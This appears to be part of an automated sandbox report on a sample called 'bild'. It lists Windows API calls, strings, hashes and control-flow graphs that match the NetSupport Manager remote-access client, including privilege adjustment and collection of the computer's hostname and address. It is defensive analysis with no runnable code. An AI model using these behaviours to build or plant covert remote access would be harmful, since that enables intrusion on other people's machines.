                                                                                                              • GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,E43C2CA5,00080000,00000000,00000000), ref: 1109D46D
                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                                              • AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 2349140579-0
                                                                                                              • Opcode ID: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                                              • Instruction ID: 1acc50509d1dc0efa8f8b8857b060522b21de2b31161cc556941a9c494b785c9
                                                                                                              • Opcode Fuzzy Hash: b2ad1513cc86a00d87a5922bdef26ddabf3e928486d47d374c40a1db595ff72d
                                                                                                              • Instruction Fuzzy Hash: AE015EB5640218ABD710DFA4CC89BAAF7BCFF44B05F10452DFA1597280D7B1AA04CB71
                                                                                                              APIs
                                                                                                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109E810,00000244,cant create events), ref: 1109D4EC
                                                                                                              • CloseHandle.KERNEL32(?,00000000,1109E810,00000244,cant create events), ref: 1109D4F5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                              • String ID:
                                                                                                              • API String ID: 81990902-0
                                                                                                              • Opcode ID: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                                              • Instruction ID: ae8e9f792a84aceb39bcb46fd7c9804e810fa9328d8f27f892a8d401e6504800
                                                                                                              • Opcode Fuzzy Hash: f88a9555f2545ca551a8130bcebdd0bed71c0aa378151d9f95003999b02a9da9
                                                                                                              • Instruction Fuzzy Hash: 55E0EC71654614ABE738CF28DC95FA677ECAF09B01F11495DF9A6D6180CA60F8408B64
                                                                                                              APIs
                                                                                                                • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                              • GetSystemMetrics.USER32(00002000), ref: 1102E7C4
                                                                                                              • FindWindowA.USER32(NSMWClass,00000000), ref: 1102E985
                                                                                                                • Part of subcall function 111100D0: GetCurrentThreadId.KERNEL32 ref: 11110166
                                                                                                                • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(-00000010,?,11031040,00000001,00000000), ref: 11110179
                                                                                                                • Part of subcall function 111100D0: InitializeCriticalSection.KERNEL32(111F08F0,?,11031040,00000001,00000000), ref: 11110188
                                                                                                                • Part of subcall function 111100D0: EnterCriticalSection.KERNEL32(111F08F0,?,11031040), ref: 1111019C
                                                                                                                • Part of subcall function 111100D0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031040), ref: 111101C2
                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102E9C1
                                                                                                              • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102E9E9
                                                                                                              • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102ECAB
                                                                                                                • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B4C
                                                                                                                • Part of subcall function 11094B30: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EA18,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B59
                                                                                                                • Part of subcall function 11094B30: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094B89
                                                                                                              • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EA48
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EA54
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 1102EA6C
                                                                                                              • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EA79
                                                                                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EA9B
                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102E7F6
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              • LoadIconA.USER32(11000000,000004C1), ref: 1102EE45
                                                                                                              • LoadIconA.USER32(11000000,000004C2), ref: 1102EE55
                                                                                                              • DestroyCursor.USER32(00000000), ref: 1102EE7E
                                                                                                              • DestroyCursor.USER32(00000000), ref: 1102EE92
                                                                                                              • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F45F
                                                                                                              • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1102F4B2
                                                                                                              • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 1102FA52
                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FA8C
                                                                                                                • Part of subcall function 11132BF0: wsprintfA.USER32 ref: 11132C60
                                                                                                                • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132C91
                                                                                                                • Part of subcall function 11132BF0: SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11132CA4
                                                                                                                • Part of subcall function 11132BF0: GetTickCount.KERNEL32 ref: 11132CAC
                                                                                                                • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                              • DispatchMessageA.USER32(?), ref: 1102FA96
                                                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1102FAA8
                                                                                                              • CloseHandle.KERNEL32(00000000,11027270,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 1102FD40
                                                                                                              • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1102FD78
                                                                                                              • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 1102FD7F
                                                                                                              • SetWindowPos.USER32(0002049E,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 1102FDB5
                                                                                                              • CloseHandle.KERNEL32(00000000,11059C10,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1102FE36
                                                                                                              • wsprintfA.USER32 ref: 1102FFA5
                                                                                                              • PostMessageA.USER32(NSMWControl32,00000000,Default,UseIPC,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 110300F7
                                                                                                              • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103010D
                                                                                                              • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 11030136
                                                                                                              • PostMessageA.USER32(00000000,00000693,00000000,00000000), ref: 1103015F
                                                                                                                • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,E43C2CA5,00000002,74DF2EE0), ref: 1112820A
                                                                                                                • Part of subcall function 111281B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 11128217
                                                                                                                • Part of subcall function 111281B0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000), ref: 1112825E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Message$Process$Window$CloseCreateEventHandlePostwsprintf$CriticalOpenSectionThread$CountCurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTickTokenVersionWait$ClassDispatchEnterErrorExitFolderLastMetricsPathPrioritySendSleepSystem__wcstoi64_malloc_memset
                                                                                                              • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$927537$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.8$V12.10.8$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                                              • API String ID: 1099283604-3957600261
                                                                                                              • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                                              • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                                              • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                                              • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1129 1102db00-1102db50 call 1110f420 1132 1102db52-1102db66 call 11142a60 1129->1132 1133 1102db68 1129->1133 1134 1102db6e-1102dbb3 call 11142290 call 11142ac0 1132->1134 1133->1134 1141 1102dd53-1102dd62 call 11144dc0 1134->1141 1142 1102dbb9 1134->1142 1148 1102dd68-1102dd78 1141->1148 1144 1102dbc0-1102dbc3 1142->1144 1146 1102dbc5-1102dbc7 1144->1146 1147 1102dbe8-1102dbf1 1144->1147 1149 1102dbd0-1102dbe1 1146->1149 1150 1102dbf7-1102dbfe 1147->1150 1151 1102dd24-1102dd3d call 11142ac0 1147->1151 1152 1102dd7a 1148->1152 1153 1102dd7f-1102dd93 call 1102cc10 1148->1153 1149->1149 1154 1102dbe3 1149->1154 1150->1151 1155 1102dcf3-1102dd08 call 11162de7 1150->1155 1156 1102dc05-1102dc07 1150->1156 1157 1102dd0a-1102dd1f call 11162de7 1150->1157 1158 1102dc9a-1102dccd call 111618c1 call 11142290 1150->1158 1159 1102dcdb-1102dcf1 call 11164010 1150->1159 1160 1102dc8b-1102dc95 1150->1160 1161 1102dccf-1102dcd9 1150->1161 1162 1102dc4c-1102dc52 1150->1162 1163 1102dc7c-1102dc86 1150->1163 1151->1144 1175 1102dd43-1102dd45 1151->1175 1152->1153 1178 1102dd98-1102dd9d 1153->1178 1154->1151 1155->1151 1156->1151 1173 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1156->1173 1157->1151 1158->1151 1159->1151 1160->1151 1161->1151 1166 1102dc54-1102dc68 call 11162de7 1162->1166 1167 1102dc6d-1102dc77 1162->1167 1163->1151 1166->1151 1167->1151 1173->1151 1183 1102de43-1102de5d call 111463d0 1175->1183 1184 1102dd4b-1102dd51 1175->1184 1178->1183 1186 1102dda3-1102ddc8 call 110b7920 call 11146450 1178->1186 1195 1102deb3-1102debf call 1102b4f0 1183->1195 1196 1102de5f-1102de78 call 1105dd10 1183->1196 1184->1141 1184->1148 1205 1102ddd3-1102ddd9 1186->1205 1206 1102ddca-1102ddd1 1186->1206 1209 1102dec1-1102dec8 1195->1209 1210 1102de98-1102de9f 1195->1210 1196->1195 1208 1102de7a-1102de8c 1196->1208 1211 1102dddb-1102dde2 call 11027d60 1205->1211 1212 1102de39 1205->1212 1206->1183 1208->1195 1225 1102de8e 1208->1225 1213 1102dea5-1102dea8 1209->1213 1214 1102deca-1102ded4 1209->1214 1210->1213 1216 1102e0aa-1102e0cb GetComputerNameA 1210->1216 1211->1212 1224 1102dde4-1102de16 1211->1224 1212->1183 1218 1102deaa-1102deb1 call 110b7920 1213->1218 1219 1102ded9 1213->1219 1214->1216 1221 1102e103-1102e109 1216->1221 1222 1102e0cd-1102e101 call 11027c30 1216->1222 1223 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1218->1223 1219->1223 1227 1102e10b-1102e110 1221->1227 1228 1102e13f-1102e152 call 11164010 1221->1228 1222->1221 1249 1102e157-1102e163 1222->1249 1281 1102e07a-1102e082 SetLastError 1223->1281 1282 1102dfbc-1102dfd3 1223->1282 1245 1102de20-1102de2f call 110f6080 1224->1245 1246 1102de18-1102de1e 1224->1246 1225->1210 1233 1102e116-1102e11a 1227->1233 1243 1102e347-1102e36a 1228->1243 1238 1102e136-1102e138 1233->1238 1239 1102e11c-1102e11e 1233->1239 1242 1102e13b-1102e13d 1238->1242 1240 1102e132-1102e134 1239->1240 1241 1102e120-1102e126 1239->1241 1240->1242 1241->1238 1248 1102e128-1102e130 1241->1248 1242->1228 1242->1249 1259 1102e392-1102e39a 1243->1259 1260 1102e36c-1102e372 1243->1260 1251 1102de32-1102de34 call 1102d330 1245->1251 1246->1245 1246->1251 1248->1233 1248->1240 1254 1102e165-1102e17a call 110b7920 call 11029bd0 1249->1254 1255 1102e17c-1102e18f call 11081a70 1249->1255 1251->1212 1287 1102e1d3-1102e1ec call 11081a70 1254->1287 1270 1102e191-1102e1b4 1255->1270 1271 1102e1b6-1102e1b8 1255->1271 1265 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 1259->1265 1266 1102e39c-1102e3a9 call 11035dd0 call 111618c1 1259->1266 1260->1259 1264 1102e374-1102e38d call 1102d330 1260->1264 1264->1259 1266->1265 1270->1287 1280 1102e1c0-1102e1d1 1271->1280 1280->1280 1280->1287 1284 1102e043-1102e04f 1281->1284 1282->1284 1295 1102dfd5-1102dfde 1282->1295 1289 1102e092-1102e0a1 1284->1289 1290 1102e051-1102e05d 1284->1290 1305 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 1287->1305 1306 1102e32c-1102e339 call 11164010 1287->1306 1289->1216 1297 1102e0a3-1102e0a4 FreeLibrary 1289->1297 1299 1102e06f-1102e073 1290->1299 1300 1102e05f-1102e06d GetProcAddress 1290->1300 1295->1284 1301 1102dfe0-1102e016 call 11146450 call 1112b270 1295->1301 1297->1216 1302 1102e084-1102e086 SetLastError 1299->1302 1303 1102e075-1102e078 1299->1303 1300->1299 1301->1284 1324 1102e018-1102e03e call 11146450 call 11027920 1301->1324 1308 1102e08c 1302->1308 1303->1308 1341 1102e283-1102e299 call 11128ec0 1305->1341 1342 1102e26f-1102e27e call 11029450 1305->1342 1320 1102e33c-1102e341 CharUpperA 1306->1320 1308->1289 1320->1243 1324->1284 1346 1102e2b2-1102e2ec call 110d0bd0 * 2 1341->1346 1347 1102e29b-1102e2ad call 110d0bd0 1341->1347 1342->1341 1354 1102e302-1102e32a call 11164010 call 110d07c0 1346->1354 1355 1102e2ee-1102e2fd call 11029450 1346->1355 1347->1346 1354->1320 1355->1354
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _malloc_memsetwsprintf
                                                                                                              • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$927537$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                              • API String ID: 3802068140-2666915323
                                                                                                              • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                                              • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                                              • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                                              • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1781 6c7a3d00-6c7a3d42 call 6c7b1c50 call 6c7a3b80 1785 6c7a3d47-6c7a3d4f 1781->1785 1786 6c7a3d6c-6c7a3d6e 1785->1786 1787 6c7a3d51-6c7a3d6b call 6c7b28e1 1785->1787 1789 6c7a3d70-6c7a3d84 call 6c796f50 1786->1789 1790 6c7a3d87-6c7a3da1 call 6c798fb0 1786->1790 1789->1790 1796 6c7a3da3-6c7a3dc4 call 6c7963c0 call 6c7b28e1 1790->1796 1797 6c7a3dc5-6c7a3e44 call 6c795e90 * 2 call 6c7a7be0 call 6c795e20 lstrlenA 1790->1797 1810 6c7a3e98-6c7a3fbe call 6c795500 call 6c796050 call 6c7a7c70 * 2 call 6c7a7d00 * 3 call 6c795060 call 6c7a7d00 _free call 6c7a7d00 gethostname call 6c7a7d00 call 6c79b8e0 1797->1810 1811 6c7a3e46-6c7a3e95 call 6c7ad8b0 call 6c795060 call 6c794830 _free 1797->1811 1842 6c7a3fc0 1810->1842 1843 6c7a3fc5-6c7a3fe1 call 6c7a7d00 1810->1843 1811->1810 1842->1843 1846 6c7a3ff8-6c7a3ffe 1843->1846 1847 6c7a3fe3-6c7a3ff5 call 6c7a7d00 1843->1847 1849 6c7a421a-6c7a4263 call 6c7a7b60 _free call 6c7998d0 call 6c7a77e0 1846->1849 1850 6c7a4004-6c7a4022 call 6c795e20 1846->1850 1847->1846 1871 6c7a4292-6c7a42aa call 6c7b28e1 1849->1871 1872 6c7a4265-6c7a4291 call 6c79a4e0 call 6c7b28e1 1849->1872 1857 6c7a405a-6c7a4084 call 6c795e20 1850->1857 1858 6c7a4024-6c7a4057 call 6c795060 call 6c7a7d00 _free 1850->1858 1866 6c7a408a-6c7a41ce call 6c795060 call 6c7a7d00 _free call 6c795e20 call 6c795060 call 6c7a7d00 _free call 6c795e20 call 6c795060 call 6c7a7d00 _free call 6c795e20 call 6c795060 call 6c7a7d00 _free 1857->1866 1867 6c7a41d1-6c7a4217 call 6c7a7d00 call 6c795e20 call 6c7a7d00 1857->1867 1858->1857 1866->1867 1867->1849
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _memset
                                                                                                              • String ID: *Dept$*Gsk$1.1$927537$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                              • API String ID: 2102423945-2612984123
                                                                                                              • Opcode ID: 75cdcf5ce644e501de30541674fafb644006770a6b661600e488e023d6f6bc50
                                                                                                              • Instruction ID: fa726f6032fdfe7f176760234684ea2c47392d40f9818df042c3f7dc94abae95
                                                                                                              • Opcode Fuzzy Hash: 75cdcf5ce644e501de30541674fafb644006770a6b661600e488e023d6f6bc50
                                                                                                              • Instruction Fuzzy Hash: 5CE1A6B29001186BCB14DBA4DE89FEF73789F44206F0046D9E50977A41DB31AF898FA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
